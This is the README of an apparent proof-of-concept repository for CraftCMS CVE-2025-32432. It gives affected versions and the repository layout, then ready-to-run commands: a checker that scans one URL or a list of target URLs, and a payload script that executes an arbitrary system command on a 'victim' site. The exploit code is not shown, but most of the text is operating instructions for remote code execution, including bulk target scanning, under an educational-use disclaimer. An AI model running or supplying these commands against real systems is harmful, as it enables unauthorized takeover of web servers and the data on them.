
CraftCMS CVE-2025-32432 - Clean PoC
Cleaned-up and improved version of the original Proof of Concept.
This project is licensed under MIT.
See the LICENSE file for more details.
This PoC is provided solely for educational purposes and authorized testing (CTF, security audits with explicit written permission).
Any use on systems without authorization is illegal. The author declines all responsibility in case of misuse.
< 3.9.15< 4.14.15< 5.6.17craftcms-cve-2025-32432-poc/
├── craftcms_rce_php_check.py
├── craftcms_final_payload.py
├── requirements.txt
├── README.md
├── LICENSE
└── .gitignore
git clone https://github.com/n40y/craftcms-cve-2025-32432-poc.git
cd craftcms-cve-2025-32432-poc
pip3 install -r requirements.txt
python3 craftcms_rce_php_check.py -u https://target.com
# Ou avec une liste
python3 craftcms_rce_php_check.py -f urls.txt -t 10
python3 craftcms_final_payload.py -u https://victim.com -c "id"
-u, --url → URL cible (obligatoire)
-c, --cmd → Commande système à exécuter (obligatoire)
-a, --asset → AssetId valide connu (optionnel)
-s, --scan-max → Max assetId à scanner (défaut: 300)